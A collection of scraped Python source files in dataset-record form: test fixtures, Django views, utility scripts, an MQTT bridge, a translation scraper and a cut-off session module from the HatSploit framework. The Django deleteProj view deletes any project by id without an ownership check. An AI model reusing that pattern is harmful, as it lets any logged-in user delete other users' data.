3,\n 'timestamp': before_date\n }, {\n 'version': '1',\n 'route_path': 'tracks/some_hash',\n 'query_string': 'with_users=true',\n 'count': 2,\n 'timestamp': before_date\n }]\n\n RouteMetrics.__table__.create(db_mock._engine)\n\n # Set up db state\n with db_mock.scoped_session() as session:\n route_metric_obj = [RouteMetrics(\n version=metric['version'],\n route_path=metric['route_path'],\n query_string=metric['query_string'],\n count=metric['count'],\n timestamp=metric['timestamp']\n ) for metric in route_metrics]\n\n session.bulk_save_objects(route_metric_obj)\n\n args_1 = {\n 'limit': 10,\n 'start_time': before_all_date,\n 'path': 'tracks/some_hash'\n }\n metrics_1 = get_route_metrics(args_1)\n\n assert len(metrics_1) == 1\n assert metrics_1[0]['count'] == 5\n\n args_2 = {\n 'limit': 10,\n 'start_time': before_all_date,\n 'path': 'tracks/some_hash',\n 'query_string': 'with_users=true'\n }\n metrics_2 = get_route_metrics(args_2)\n\n assert len(metrics_2) == 1\n assert metrics_2[0]['count'] == 2\n\n args_3 = {\n 'limit': 10,\n 'start_time': before_all_date,\n 'path': 'tracks/some_hash',\n 'query_string': 'with_users=WRONG'\n }\n metrics_3 = get_route_metrics(args_3)\n\n assert not metrics_3\n","sub_path":"discovery-provider/src/queries/get_route_metrics_test.py","file_name":"get_route_metrics_test.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"318914457","text":"import os\nimport pathlib\nimport platform\nfrom typing import Generator\n\nimport pytest\n\nfrom . 
import helpers\n\n\n@pytest.fixture\ndef tmp_home(tmp_path: pathlib.Path) -> Generator[pathlib.Path, None, None]:\n \"\"\"Change the home directory to a tmp folder for the duration of a test.\"\"\"\n # Try multiple combinations for Unix/Windows\n home_envs = [\"HOME\", \"USERPROFILE\"]\n old_homes = {name: os.environ.get(name) for name in home_envs}\n\n if len(home_envs) > 0:\n new_home = tmp_path / \"home\"\n new_home.mkdir(parents=True, exist_ok=True)\n for env in home_envs:\n os.environ[env] = str(new_home)\n yield new_home\n for env, home in old_homes.items():\n if old_homes[env] is None:\n del os.environ[env]\n else:\n os.environ[env] = home\n else:\n yield pathlib.Path.home()\n\n\n@pytest.fixture(scope=\"session\")\ndef tmp_pkgs_dirs(tmp_path_factory: pytest.TempPathFactory) -> pathlib.Path:\n \"\"\"A common package cache for mamba downloads.\n\n The directory is not used automatically when calling this fixture.\n \"\"\"\n return tmp_path_factory.mktemp(\"pkgs_dirs\")\n\n\n@pytest.fixture(params=[False])\ndef shared_pkgs_dirs(request) -> bool:\n \"\"\"A dummy fixture to control the use of shared package dir.\"\"\"\n return request.param\n\n\n@pytest.fixture\ndef tmp_clean_env(\n tmp_pkgs_dirs: pathlib.Path, shared_pkgs_dirs: bool\n) -> Generator[None, None, None]:\n \"\"\"Remove all Conda/Mamba activation artifacts from environment.\"\"\"\n saved_environ = {}\n for k, v in os.environ.items():\n if k.startswith((\"CONDA\", \"_CONDA\", \"MAMBA\", \"_MAMBA\")):\n saved_environ[k] = v\n del os.environ[k]\n\n def keep_in_path(\n p: str, prefix: str | None = saved_environ.get(\"CONDA_PREFIX\")\n ) -> bool:\n if \"condabin\" in p:\n return False\n # On windows, PATH is also used for dynamic libraries.\n if (prefix is not None) and (platform.system() != \"Windows\"):\n p = str(pathlib.Path(p).expanduser().resolve())\n prefix = str(pathlib.Path(prefix).expanduser().resolve())\n return not p.startswith(prefix)\n return True\n\n path_list = os.environ[\"PATH\"].split(os.pathsep)\n path_list = [p for p in path_list if keep_in_path(p)]\n os.environ[\"PATH\"] = os.pathsep.join(path_list)\n\n if shared_pkgs_dirs:\n os.environ[\"CONDA_PKGS_DIRS\"] = str(tmp_pkgs_dirs)\n\n yield None\n\n os.environ.update(saved_environ)\n\n\n@pytest.fixture(params=[helpers.random_string, \"long_prefix_\" * 20])\ndef tmp_env_name(request) -> str:\n \"\"\"Return the explicit or implicit parametrization.\"\"\"\n if callable(request.param):\n return request.param()\n return request.param\n\n\n@pytest.fixture\ndef tmp_root_prefix(\n tmp_path: pathlib.Path, tmp_clean_env: None\n) -> Generator[pathlib.Path, None, None]:\n \"\"\"Change the micromamba root directory to a tmp folder for the duration of a test.\"\"\"\n old_root_prefix = os.environ.get(\"MAMBA_ROOT_PREFIX\")\n new_root_prefix = tmp_path / \"mamba\"\n new_root_prefix.mkdir(parents=True, exist_ok=True)\n os.environ[\"MAMBA_ROOT_PREFIX\"] = str(new_root_prefix)\n yield new_root_prefix\n if old_root_prefix is not None:\n os.environ[\"MAMBA_ROOT_PREFIX\"] = old_root_prefix\n else:\n del os.environ[\"MAMBA_ROOT_PREFIX\"]\n\n\n@pytest.fixture\ndef tmp_empty_env(\n tmp_root_prefix: pathlib.Path, tmp_env_name: str\n) -> Generator[pathlib.Path, None, None]:\n \"\"\"An empty environment created under a temporary root prefix.\"\"\"\n helpers.create(\"-n\", tmp_env_name, no_dry_run=True)\n yield tmp_root_prefix\n\n\n@pytest.fixture\ndef tmp_prefix(\n tmp_root_prefix: pathlib.Path, tmp_env_name: str\n) -> Generator[pathlib.Path, None, None]:\n \"\"\"Change the conda prefix to 
a tmp folder for the duration of a test.\"\"\"\n old_prefix = os.environ.get(\"CONDA_PREFIX\")\n new_prefix = tmp_root_prefix / \"envs\" / tmp_env_name\n new_prefix.mkdir(parents=True, exist_ok=True)\n os.environ[\"CONDA_PREFIX\"] = str(new_prefix)\n yield new_prefix\n if old_prefix is not None:\n os.environ[\"CONDA_PREFIX\"] = old_prefix\n else:\n del os.environ[\"CONDA_PREFIX\"]\n","sub_path":"micromamba/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"576119080","text":"from django.db.models.fields import files\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.shortcuts import redirect, render , get_object_or_404\r\nfrom django.contrib.auth.models import User\r\nfrom .models import Profile , Project\r\nfrom portfolio.forms import ProfileForm , ProjectForm\r\n\r\n# Create your views here.\r\ndef indexpage(request):\r\n\r\n users = User.objects.all().order_by('-date_joined')\r\n\r\n context = {'users': users}\r\n return render(request, 'index.html' ,context)\r\n\r\n\r\ndef dashboard(request):\r\n return render(request, 'dashboard.html')\r\n\r\ndef detail_profil(request, id=None):\r\n user = get_object_or_404(User, id=id)\r\n profile = get_object_or_404(Profile, user=user)\r\n context = {'profile': profile }\r\n return render(request, 'profil.html' ,context)\r\n\r\n# trying to find a solution so the user can see their own projects\r\ndef InfosPage(request):\r\n \r\n return render(request, 'infos.html')\r\n\r\n# this is for when the person is a user\r\n# a logged-in user\r\n@login_required(login_url='authentificate')\r\ndef viewByUser(request):\r\n mypros = request.user.projects.all()\r\n\r\n context = {'mypros': mypros}\r\n return render(request, 'template_project.html', context)\r\n\r\n@login_required(login_url='authentificate')\r\ndef deleteProj(request, id=None):\r\n\r\n Project.objects.get(id=id).delete()\r\n return redirect(\"dash\")\r\n\r\n\r\n\r\n# this is for when the person is not a user\r\n# but they can still view a project\r\ndef detail_project(request, id=None):\r\n project = get_object_or_404(Project, id=id)\r\n context = {'project': project}\r\n return render(request, 'project.html', context)\r\n\r\n@login_required(login_url='authentificate')\r\ndef newProfile(request):\r\n\r\n if request.method == \"POST\":\r\n myprofil = ProfileForm(data=request.POST, files=request.FILES)\r\n if myprofil.is_valid(): # if the profile is valid\r\n mypro = request.user.profile\r\n mypro.name = request.POST.get(\"name\")\r\n mypro.last_name = request.POST.get(\"last_name\")\r\n mypro.email = request.POST.get(\"email\")\r\n mypro.photo = request.FILES.get(\"photo\")\r\n mypro.phone = request.POST.get(\"phone\")\r\n mypro.save()\r\n return redirect(\"dash\")\r\n \r\n else:\r\n print(\"profile ou an pa ajoute patiza\")\r\n else:\r\n myprofil = ProfileForm()\r\n context = {'myprofil': myprofil}\r\n return render(request, 'my_profile.html', context)\r\n\r\n@login_required(login_url=\"authentificate\")\r\ndef newProjects(request):\r\n if request.method == \"POST\":\r\n myprojects = ProjectForm(data=request.POST, files=request.FILES)\r\n if myprojects.is_valid():\r\n myprojects.cleaned_data.get('category')\r\n myprojects.cleaned_data.get('title')\r\n myprojects.cleaned_data.get('description')\r\n myprojects.cleaned_data.get('photo')\r\n \r\n mypro = myprojects.save(commit=False)\r\n mypro.user = request.user\r\n mypro.save()\r\n\r\n 
myprojects.save_m2m()\r\n #projects.category.add(category)\r\n \r\n\r\n return redirect(\"dash\")\r\n else:\r\n print(\"project w lan pa ajoute nan base de donne an patizan\")\r\n \r\n else:\r\n myprojects = ProjectForm()\r\n context = {'myprojects': myprojects}\r\n return render(request, 'allprojects.html', context)\r\n\r\n\r\n\r\n","sub_path":"platfom/portfolio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"205370048","text":"import os\nimport csv\nimport shutil\nimport cv2 as cv\nimport math\n\nTEST_FRACTION = 0.1\n\nimages_path = input('Training images folder path (must end with /): ')\ncsv_path = input('Training ground truth table .csv file path: ')\n\ntrain_output_path = '../data/task2/training_sorted_resized'\ntest_outputh_path = '../data/task2/testing_sorted_resized'\n\nos.makedirs(train_output_path)\nos.makedirs(test_outputh_path)\n\nclasses = ['Melanoma', 'Melanocytic_Nevus', 'Basal_Cell_Carcinoma', 'Actinic_Keratosis', 'Benign_Keratosis', 'Dermatofibroma', 'Vascular_Lesion']\n\nfor class_name in classes:\n os.makedirs(train_output_path + '/' + class_name)\n os.makedirs(test_outputh_path + '/' + class_name)\n\nwith open(csv_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n\n csv_reader.__next__()\n\n for row in csv_reader:\n img_name = row[0] + '.jpg'\n \n img_path = images_path + img_name\n img = cv.imread(img_path)\n print(img_path)\n resized_img = cv.resize(img, (224, 224), interpolation = cv.INTER_AREA)\n\n j = 1\n\n for j in range(1, len(row)):\n if row[j] == '1.0':\n classification = row[1]\n break\n \n print(train_output_path + '/' + classes[j - 1])\n cv.imwrite(train_output_path + '/' + classes[j - 1] + '/' + img_name, resized_img)\n\nfor directory in os.listdir(train_output_path):\n train_sub_directory = os.path.join(train_output_path, directory)\n test_sub_directory = os.path.join(test_outputh_path, directory)\n\n for _, _, images in os.walk(train_sub_directory):\n total_images = len(images)\n test_images_no = math.floor(total_images * TEST_FRACTION)\n\n for i in range(test_images_no):\n shutil.move(os.path.join(train_sub_directory, images[i]), os.path.join(test_sub_directory, images[i]))","sub_path":"src/group_images_task_2.py","file_name":"group_images_task_2.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"174067881","text":"import logging\nimport json\n\nfrom keywords.exceptions import FeatureSupportedError\nfrom utilities.cluster_config_utils import get_cbs_servers, get_sg_version\n\n\n# TODO: Use python logging hooks instead of wrappers - https://github.com/couchbaselabs/mobile-testkit/issues/686\ndef log_info(message, is_verify=False):\n # pytest will capture stdout / stderr\n # by using 'print' the html reporting and running the test with -s will pick up this output in the console\n # If verify is true, the message will have the format \" > This is some message\" for cleaner output\n\n if is_verify:\n message = \" > {}\".format(message)\n\n print(message)\n logging.info(message)\n\n\ndef log_section():\n output = \"----------------\"\n print(output)\n logging.info(output)\n\n\ndef log_debug(message):\n \"\"\"Wrapper around logging.debug if we want to add hooks in the future.\"\"\"\n logging.debug(message)\n\n\ndef log_error(message):\n \"\"\"Wrapper around logging.error if we want to add hooks in the 
future.\"\"\"\n print(message)\n logging.error(message)\n\n\ndef log_warn(message):\n \"\"\"Wrapper around logging.warn if we want to add hooks in the future.\"\"\"\n print(message)\n logging.warn(message)\n\n\ndef log_r(request, info=True):\n request_summary = \"{0} {1} {2}\".format(\n request.request.method,\n request.request.url,\n request.status_code\n )\n\n if info:\n log_info(request_summary)\n\n logging.debug(\"{0} {1}\\nHEADERS = {2}\\nBODY = {3}\".format(\n request.request.method,\n request.request.url,\n request.request.headers,\n request.request.body))\n\n logging.debug(\"{}\".format(request.text))\n\n\ndef version_is_binary(version):\n if len(version.split(\".\")) > 1:\n # ex 1.2.1 or 1.2.1-4\n return True\n else:\n return False\n\n\ndef version_and_build(full_version):\n version_parts = full_version.split(\"-\")\n assert len(version_parts) == 2\n return version_parts[0], version_parts[1]\n\n\ndef host_for_url(url):\n \"\"\" Takes a url in the form of http://192.168.33.10:4985\n and returns an host in the form 192.168.33.10\n \"\"\"\n\n if \"https\" in url:\n host = url.replace(\"https://\", \"\")\n else:\n host = url.replace(\"http://\", \"\")\n\n host = host.split(\":\")[0]\n log_info(\"Extracted host ({}) from url ({})\".format(host, url))\n\n return host\n\n\n# Targeted playbooks need to use the host_name (i.e. sg1)\ndef hostname_for_url(cluster_config, url):\n cluster_config = \"{}.json\".format(cluster_config)\n with open(cluster_config) as f:\n logging.info(\"Using cluster config: {}\".format(cluster_config))\n cluster = json.loads(f.read())\n\n logging.debug(cluster)\n\n # strip possible ports\n url = url.replace(\"http://\", \"\")\n url = url.replace(\":4984\", \"\")\n url = url.replace(\":4985\", \"\")\n url = url.replace(\":8091\", \"\")\n\n endpoints = cluster[\"sg_accels\"]\n endpoints.extend(cluster[\"sync_gateways\"])\n endpoints.extend(cluster[\"couchbase_servers\"])\n endpoints.extend(cluster[\"load_balancers\"])\n\n logging.debug(endpoints)\n\n for endpoint in endpoints:\n if endpoint[\"ip\"] == url:\n logging.info(\"Name found for url: {}. Returning: {}\".format(url, endpoint[\"name\"]))\n return endpoint[\"name\"]\n\n raise ValueError(\"Could not find name for url: {} in cluster_config: {}\".format(url, cluster_config))\n\n\ndef dump_file_contents_to_logs(filename):\n try:\n log_info(\"Contents of {}: {}\".format(filename, open(filename).read()))\n except Exception as e:\n log_info(\"Error reading {}: {}\".format(filename, e))\n\n\n# Check if this version has net45\ndef has_dot_net4_dot_5(version):\n version_prefixes = [\n \"1.2\",\n \"1.3\",\n \"1.4.0\" # For 1.4, the path is net45/LiteServ.exe, for 1.4.0, there is no net45\n ]\n\n for i in version_prefixes:\n if version.startswith(i):\n return False\n\n return True\n\n\ndef compare_versions(version_one, version_two):\n \"\"\" Checks two version and returns the following:\n\n Version should be of the following formats 1.4.2 or 1.4.1\n\n if version_one == version two, return 0\n if version_one < version_two, return -1,\n if version_one > version_two, return 1\n \"\"\"\n\n # Strip build number if present, 1.4.1-345 -> 1.4.1\n version_one = version_one.split('-')[0]\n version_two = version_two.split('-')[0]\n\n # Strip '.' 
and convert to integers\n version_one_number_string = version_one.replace('.', '')\n version_two_number_string = version_two.replace('.', '')\n\n version_one_number_string_len = len(version_one_number_string)\n version_two_number_string_len = len(version_two_number_string)\n\n # Handle the case where 1.4 and 1.4.0 should be equal\n # by padding 0s on the right of the shorter number\n difference = abs(version_one_number_string_len - version_two_number_string_len)\n if difference != 0 and version_one_number_string_len < version_two_number_string_len:\n for _ in range(difference):\n version_one_number_string += \"0\"\n if difference != 0 and version_one_number_string_len > version_two_number_string_len:\n for _ in range(difference):\n version_two_number_string += \"0\"\n\n version_one_number = int(version_one_number_string)\n version_two_number = int(version_two_number_string)\n\n if version_one_number < version_two_number:\n return -1\n\n if version_one_number > version_two_number:\n return 1\n\n # All components are equal\n return 0\n\n\ndef check_xattr_support(server_version, sync_gateway_version):\n if compare_versions(server_version, '5.0.0') < 0:\n raise FeatureSupportedError('Make sure you are using Couchbase Server 5.0+ for xattrs')\n if compare_versions(sync_gateway_version, '1.5') < 0:\n raise FeatureSupportedError('Make sure you are using Couchbase Sync Gateway 1.5+ for xattrs')\n\n\ndef add_cbs_to_sg_config_server_field(cluster_config):\n \"\"\" This method gets all CBS server IPs from the cluster config and\n adds them as the server field in the sync gateway config file. Each IP is separated\n by a comma\n Format of the server field in sync-gateway config if there are 3 couchbase servers\n server: \"http://xxx.xxx.xx.xx,xx1.xx1.x1.x1,xx2,xx2,x2,x2:8091 \"\"\"\n couchbase_server_primary_node = \"\"\n sg_version = get_sg_version(cluster_config)\n cbs_servers = get_cbs_servers(cluster_config)\n if compare_versions(sg_version, '1.5') < 0:\n couchbase_server_primary_node = cbs_servers[0]\n else:\n for i in range(len(cbs_servers)):\n couchbase_server_primary_node = couchbase_server_primary_node + cbs_servers[i]\n if (i + 1) < len(cbs_servers):\n couchbase_server_primary_node = couchbase_server_primary_node + \",\"\n\n return couchbase_server_primary_node\n","sub_path":"keywords/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"238776836","text":"import argparse\nimport time\nimport requests\nimport logging\nimport random\nimport json\nfrom paho.mqtt import client as mqtt_client\n\n\nlogging.basicConfig(level=logging.DEBUG, format=\"[%(module)s] %(message)s\")\nlog = logging.getLogger(__name__)\n\n\ndef get_response(url):\n headers = {'Content-Type': 'application/json'}\n session = requests.Session()\n\n response = session.request(\n method='GET',\n url=url,\n headers=headers,\n timeout=8\n )\n\n log.debug(f'Response status: {response}')\n\n return response.json() # dict()\n\n\ndef fresh_list_full():\n # detailed list of current sensors\n url = f'http://{_url}/json.htm?type=devices'\n fresh_info = get_response(url)\n\n list_accs = []\n try:\n for acc in fresh_info['result']:\n list_accs.append(acc)\n except Exception:\n pass\n\n return list_accs\n\n\ndef _value(_data, _type):\n if _type == 'Temp':\n value = float(_data.split(' ')[0])\n elif _type == 'Humidity':\n value = float(_data.split(' ')[1])\n elif _type == 'Light/Switch':\n if _data == 'Off':\n value = 
'true'\n else:\n value = None\n\n return value\n\n\ndef form_dom_humidity(acc_info, idx, get_topic):\n return {\n \"topic\": f\"humidity/idx{idx}\",\n \"name\": acc_info[\"Name\"],\n \"manufacturer\": \"DIY\",\n \"model\": \"humiditysensor\",\n \"serialNumber\": f'{acc_info[\"ID\"]}_{idx}',\n \"type\": \"humiditysensor\",\n \"feature\": {\n \"currentrelativehumidity\": {\n \"getTopic\": get_topic,\n \"setTopic\": f\"humidity/idx{idx}/currentrelativehumidity/set\"\n }\n }\n }\n\n\ndef form_dom_temperature(acc_info, idx, get_topic):\n return {\n \"topic\": f\"temperature/idx{idx}\",\n \"name\": acc_info[\"Name\"],\n \"manufacturer\": \"DIY\",\n \"model\": \"temperaturesensor\",\n \"serialNumber\": f'{acc_info[\"ID\"]}_{idx}',\n \"type\": \"temperaturesensor\",\n \"feature\": {\n \"currenttemperature\": {\n \"getTopic\": get_topic,\n \"setTopic\": f\"temperature/idx{idx}/currenttemperature/set\"\n }\n }\n }\n\n\ndef form_dom_motion(acc_info, idx, get_topic):\n return {\n \"topic\": f\"motion/idx{idx}\",\n \"name\": acc_info[\"Name\"],\n \"manufacturer\": \"DIY\",\n \"model\": \"motionsensor\",\n \"serialNumber\": f'{acc_info[\"ID\"]}_{idx}',\n \"type\": \"motionsensor\",\n \"feature\": {\n \"motiondetected\": {\n \"getTopic\": get_topic,\n \"setTopic\": f\"motion/idx{idx}/motiondetected/set\"\n }\n }\n }\n\n\ndef convert_dom(dev_data):\n _type = dev_data['Type']\n idx = dev_data['idx']\n\n if _type == 'Humidity':\n get_topic = f'humidity/idx{idx}/currentrelativehumidity/get'\n _form = form_dom_humidity(dev_data, idx, get_topic)\n elif _type == 'Temp':\n get_topic = f'temperature/idx{idx}/currenttemperature/get'\n _form = form_dom_temperature(dev_data, idx, get_topic)\n elif _type == 'Light/Switch':\n get_topic = f'motion/idx{idx}/motiondetected/get'\n _form = form_dom_motion(dev_data, idx, get_topic)\n else:\n return None, None, None, None\n\n return _form, _type, get_topic, idx\n\n\ndef connect_mqtt():\n def on_connect(client, userdata, flags, rc):\n if rc == 0:\n print(\"Connected to MQTT Broker!\")\n else:\n print(\"Failed to connect, return code %d\\n\", rc)\n\n client = mqtt_client.Client(client_id)\n client.username_pw_set(username, password)\n client.on_connect = on_connect\n client.connect(broker, port)\n return client\n\n\ndef publish(client):\n\n while True:\n time.sleep(3)\n\n # = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =\n\n list_accs = fresh_list_full()\n if list_accs:\n\n for acc in list_accs:\n msg, _type, get_topic, idx = convert_dom(acc)\n announce_topic = f'announce/idx{idx}/'\n\n if _type:\n # отправка анонса\n result = client.publish(announce_topic, str(msg).replace(\"'\", '\"'), retain=True)\n status = result[0]\n\n if status == 0:\n log.info(f\"Send `{msg}` to topic `{announce_topic}`\")\n\n # отправка значения\n msg = _value(acc['Data'], _type)\n result = client.publish(\n get_topic, str(msg).replace(\"'\", '\"'), retain=True)\n status = result[0]\n\n if status == 0:\n log.info(f\"Send `{msg}` to topic `{get_topic}`\")\n else:\n log.info(\n f\"Failed to send message to topic {get_topic}\")\n\n else:\n log.info(f\"Failed to send message to topic {announce_topic}\")\n\n else:\n log.info(f\"No active devices\")\n\n # = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =\n\n\ndef subscribe(client: mqtt_client):\n def on_message(client, userdata, msg):\n str_msg = msg.payload.decode()\n dict_msg = json.loads(str_msg)\n\n try:\n type_access = dict_msg['dtype']\n _idx = dict_msg['idx']\n\n try:\n value = float(dict_msg['nvalue'])\n except Exception:\n 
value = dict_msg['nvalue']\n\n except Exception as exp:\n log.error(exp)\n type_access = None\n\n if type_access:\n if type_access == 'Temp':\n get_topic = f'temperature/idx{_idx}/currenttemperature/get'\n elif type_access == 'Humidity':\n get_topic = f'humidity/idx{_idx}/currentrelativehumidity/get'\n elif type_access == 'Light/Switch':\n get_topic = f'motion/idx{_idx}/motiondetected/get'\n else:\n get_topic = None\n\n if get_topic:\n result = client.publish(get_topic, str(value).replace(\"'\", '\"'), retain=True)\n status = result[0]\n\n if status == 0:\n log.info(f\"Send `{value}` to topic `{get_topic}`\")\n else:\n log.info(f\"Failed to send message to topic {get_topic}\")\n\n else:\n pass\n\n client.subscribe(topic)\n client.on_message = on_message\n\n\ndef pub():\n client = connect_mqtt()\n client.loop_start()\n subscribe(client)\n publish(client)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-u\", \"--username\", type=str, help=\"mqtt username\")\n parser.add_argument(\"-p\", \"--password\", type=str, help=\"mqtt password\")\n parser.add_argument(\"-b\", \"--broker\", type=str, help=\"ip mqtt broker\") # \"192.168.0.74\"\n parser.add_argument(\"-s\", \"--port\", type=str, help=\"port mqtt broker\") # \"1883\"\n parser.add_argument(\"-t\", \"--topic\", type=str, help=\"mqtt topic domoticz\") # \"domoticz/#\"\n parser.add_argument(\"--host\", type=str, help=\"host domoticz [host:port]\") # \"Host:Port\" (no \"-h\" short flag: it conflicts with argparse's built-in help)\n args = parser.parse_args()\n\n client_id = f'python-mqtt-{random.randint(0, 1000)}'\n username = args.username\n password = args.password\n broker = args.broker\n port = int(args.port)\n topic = args.topic\n _url = args.host\n\n pub()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"654533752","text":"import requests\r\nimport json\r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nHEADERS = {\r\n \"User-Agent\": \"Mozilla/5.0\",\r\n \"Content-Type\": \"application/json; charset=UTF-8\"\r\n}\r\n\r\nclass ReversoContextAPI(object):\r\n \r\n def __init__(self, source_text=\"я люблю кошек\", target_text=\"\", source_lang=\"ru\", target_lang=\"en\"):\r\n self.data = {\r\n \"source_text\": source_text,\r\n \"target_text\": target_text,\r\n \"source_lang\": source_lang,\r\n \"target_lang\": target_lang,\r\n \"npage\": 1,\r\n \"mode\": 0\r\n }\r\n self.page_count = requests.post(\"https://context.reverso.net/bst-query-service\", headers=HEADERS, data=json.dumps(self.data)).json()[\"npages\"]\r\n\r\n def get_page(self, npage):\r\n data = self.data.copy()\r\n data[\"npage\"] = npage\r\n return requests.post(\"https://context.reverso.net/bst-query-service\", headers=HEADERS, data=json.dumps(data)).json()[\"list\"]\r\n\r\n def get_results_pair_by_pair(self):\r\n for npage in range(1, self.page_count + 1):\r\n for word in self.get_page(npage):\r\n yield (BeautifulSoup(word[\"s_text\"]).text, BeautifulSoup(word[\"t_text\"]).text)\r\n\r\n def get_results(self):\r\n return [pair for pair in self.get_results_pair_by_pair()]\r\n \r\nif __name__ == \"__main__\":\r\n api = ReversoContextAPI(\r\n input(\"Enter the source text to search... \"),\r\n input(\"Enter the target text to search (optional)... \"),\r\n input(\"Enter the source language code... \"),\r\n input(\"Enter the target language code... 
\")\r\n )\r\n results = api.get_results_pair_by_pair()\r\n for pair in results:\r\n print(pair[0], \"=\", pair[1])\r\n","sub_path":"context/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"560146007","text":"# Copyright 2021 Zilliz. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport unittest\nfrom queue import Queue\n\nfrom towhee.dataframe import DataFrame, Variable\nfrom towhee.engine._operator_io import MapDataFrameReader\n\nfrom towhee.tests.test_util.dataframe_test_util import DfWriter, MultiThreadRunner\n\n\nclass TestOperatorIO(unittest.TestCase):\n \"\"\"\n op_ctx IO test\n \"\"\"\n\n def test_map_reader(self):\n df = DataFrame('test')\n data = (Variable('int', 1), Variable(\n 'str', 'test'), Variable('float', 0.1))\n t = DfWriter(df, 10, data=data)\n t.start()\n t.join()\n\n map_reader = MapDataFrameReader(df, {'v1': 0, 'v2': 2})\n self.assertEqual(map_reader.size, 10)\n count = 0\n while True:\n item = map_reader.read()\n if not item:\n break\n self.assertEqual(item, {'v1': 1, 'v2': 0.1})\n count += 1\n self.assertEqual(count, 10)\n df.seal()\n self.assertEqual(map_reader.read(), None)\n\n def test_map_reader_multithread(self):\n df = DataFrame('test')\n data = (Variable('int', 1), Variable(\n 'str', 'test'), Variable('float', 0.1))\n data_size = 100\n t = DfWriter(df, data_size, data=data)\n t.set_sealed_when_stop()\n t.start()\n map_reader = MapDataFrameReader(df, {'v1': 0, 'v2': 2})\n\n q = Queue()\n\n def read(map_reader: MapDataFrameReader, q: Queue):\n while True:\n item = map_reader.read()\n if item:\n q.put(item)\n continue\n elif item is None:\n break\n else:\n pass\n\n runner = MultiThreadRunner(\n target=read, args=(map_reader, q), thread_num=10)\n\n runner.start()\n runner.join()\n\n count = 0\n while not q.empty():\n self.assertEqual(q.get(), {'v1': 1, 'v2': 0.1})\n count += 1\n self.assertEqual(count, data_size)\n","sub_path":"towhee/tests/dataframe/test_operator_io.py","file_name":"test_operator_io.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"436687782","text":"#!/usr/bin/env python3\n\n#\n# MIT License\n#\n# Copyright (c) 2020-2021 EntySec\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# 
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\nfrom hatsploit.lib.storage import LocalStorage\nfrom hatsploit.core.cli.badges import Badges\n\n\nclass Sessions:\n def __init__(self):\n self.badges = Badges()\n self.local_storage = LocalStorage()\n\n def get_all_sessions(self):\n sessions = self.local_storage.get(\"sessions\")\n return sessions\n\n def add_session(self, session_platform, session_type, session_host, session_port, session_object):\n if not self.local_storage.get(\"sessions\"):\n self.local_storage.set(\"sessions\", dict())\n\n session_id = 0\n if session_platform in self.local_storage.get(\"sessions\").keys():\n sessions = self.local_storage.get(\"sessions\")\n session_id = len(sessions[session_platform])\n sessions[session_platform][int(session_id)] = {\n 'type': session_type,\n 'host': session_host,\n 'port': session_port,\n 'object': session_object\n }\n else:\n sessions = {\n session_platform: {\n int(session_id): {\n 'type': session_type,\n 'host': session_host,\n 'port': session_port,\n 'object': session_object\n }\n }\n }\n\n self.local_storage.update(\"sessions\", sessions)\n return session_id\n\n def check_exist(self, session_platform, session_id, session_type=\"\"):\n sessions = self.local_storage.get(\"sessions\")\n if sessions:\n if session_platform in sessions.keys():\n if int(session_id) in sessions[session_platform].keys():\n if session_type:\n if sessions[session_platform][int(session_id)]['type'] == session_type:\n return True\n return False\n return True\n return False\n\n def spawn_interactive_connection(self, session_platform, session_id):\n sessions = self.local_storage.get(\"sessions\")\n if self.check_exist(session_platform, session_id):\n self.badges.output_process(\"Interacting with session \" + str(session_id) + \"...\")\n self.badges.output_success(\"Interactive 